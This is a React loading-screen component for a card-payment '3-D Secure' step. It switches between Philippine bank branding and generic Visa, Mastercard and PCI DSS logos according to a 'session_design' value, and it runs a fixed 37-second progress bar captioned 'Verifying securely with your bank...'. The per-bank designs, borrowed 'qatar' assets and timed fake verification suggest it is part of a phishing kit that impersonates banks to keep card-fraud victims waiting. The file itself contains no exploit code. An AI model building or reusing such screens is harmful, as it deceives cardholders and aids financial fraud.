import React from 'react';
import { motion } from 'framer-motion';
import { isPhilippinesBankDesign, PHILIPPINES_BANKS } from './philippines/PhilippinesBankLayout';
import { isMastercard } from '../cardScheme';
import './Loader.css';
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';

const Loading = () => {
  const design = localStorage.getItem('session_design') || '';
  const isMc = isMastercard(design);
  const isVisa = !isMc;

  const isPH = isPhilippinesBankDesign(design);

  // 1. Philippine Banks: Clean Straight Modern Progress Bar
  if (isPH) {
    const bank = PHILIPPINES_BANKS[design] || PHILIPPINES_BANKS.ph_default;
    const barColor = bank.primaryColor || '#003B70';
    const vsImg = '/images/qatar/vs_loading.png';
    const msImg = '/images/qatar/ms_loading.png';
    const schemeImg = isVisa ? vsImg : msImg;
    const altText = isVisa ? 'Visa Secure' : 'Mastercard Identity Check';

    return (
      <div className="flex flex-col items-center justify-center w-full min-h-screen bg-white p-4">
        <div className="w-full max-w-md flex flex-col items-center px-4 py-8">
          {/* Bank Logo if available */}
          {bank?.logo && (
            <img
              src={bank.logo}
              alt={bank.name}
              className="h-10 mb-6 object-contain"
              onError={(e) => { e.target.style.display = 'none'; }}
            />
          )}

          {/* Clean straight rounded pill loading bar */}
          <div
            style={{
              position: 'relative',
              width: '100%',
              height: '14px',
              backgroundColor: '#f1f5f9',
              borderRadius: '9999px',
              overflow: 'hidden',
              border: '1px solid #e2e8f0',
              boxSizing: 'border-box'
            }}
          >
            <motion.div
              style={{
                position: 'absolute',
                top: 0,
                left: 0,
                height: '100%',
                backgroundColor: barColor,
                borderRadius: '9999px'
              }}
              initial={{ width: '0%' }}
              animate={{ width: '100%' }}
              transition={{
                duration: 37,
                ease: 'linear',
              }}
            />
          </div>

          {/* Card Scheme Logo */}
          <img
            src={schemeImg}
            alt={altText}
            className="mt-6 object-contain h-8"
            onError={(e) => { e.target.style.display = 'none'; }}
          />

          {/* Status subtext */}
          <p className="mt-4 text-xs text-neutral-500 text-center font-medium">
            Verifying securely with your bank...
          </p>
        </div>
      </div>
    );
  }

  // 2. Standard 3DS Loading Layout
  let imageSrc, altText;
  if (isVisa) {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (isMc) {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  } else {
    imageSrc = null;
    altText = 'Card';
  }

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-gray-50">
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-gray-200 rounded-lg shadow-sm">
        <div className="flex flex-col items-center justify-between w-full mb-6">
          <img
            src={PciImage} 
            alt="PCI DSS Compliant"
            className="h-10 mb-8"
          />

          <div className="my-8 cus-loader"></div>
          
          <div className="flex items-center justify-center gap-6 mt-8">
            {imageSrc && (
              <img src={imageSrc} alt={altText} className="h-8 w-auto object-contain" />
            )}
            {imageSrc && <div className="h-8 w-px bg-gray-300"></div>}
          </div>
        </div>
      </div>
    </div>
  );
};

export default Loading;
